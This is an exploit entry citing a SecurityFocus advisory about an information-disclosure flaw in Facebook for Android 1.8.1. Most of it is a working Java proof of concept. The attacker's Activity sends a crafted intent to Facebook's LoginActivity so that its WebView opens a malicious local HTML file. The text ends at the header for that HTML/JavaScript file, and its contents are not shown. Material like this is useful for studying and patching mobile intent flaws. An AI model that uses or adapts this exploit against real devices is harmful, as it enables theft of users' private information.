source: https://www.securityfocus.com/bid/57173/info Facebook for Android is prone to an information-disclosure vulnerability. Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks. Facebook for Android 1.8.1 is vulnerable; other versions may also be affected. ++++++ Attacker's app (activity) ++++++ // notice: for a successful attack, the victim user must be logged-in // to Facebook in advance. public class AttackFacebook extends Activity { // package name of Facebook app static final String FB_PKG = "com.facebook.katana"; // LoginActivity of Facebook app static final String FB_LOGIN_ACTIVITY = FB_PKG + ".LoginActivity"; // FacebookWebViewActivity of Facebook app static final String FB_WEBVIEW_ACTIVITY = FB_PKG + ".view.FacebookWebViewActivity"; @Override public void onCreate(Bundle bundle) { super.onCreate(bundle); attack(); } // main method public void attack() { // create continuation_intent to call FacebookWebViewActivity. Intent contIntent = new Intent(); contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY); // URL pointing to malicious local file. // FacebookWebViewActivity will load this URL into its WebView. contIntent.putExtra("url", "file:///sdcard/attack.html"); // create intent to be sent to LoginActivity. Intent intent = new Intent(); intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY); intent.putExtra("login_redirect", false); // put continuation_intent into extra data of the intent. intent.putExtra(FB_PKG + ".continuation_intent", contIntent); // call LoginActivity this.startActivity(intent); } } ++++++ Attacker's HTML/JavaScript file ++++++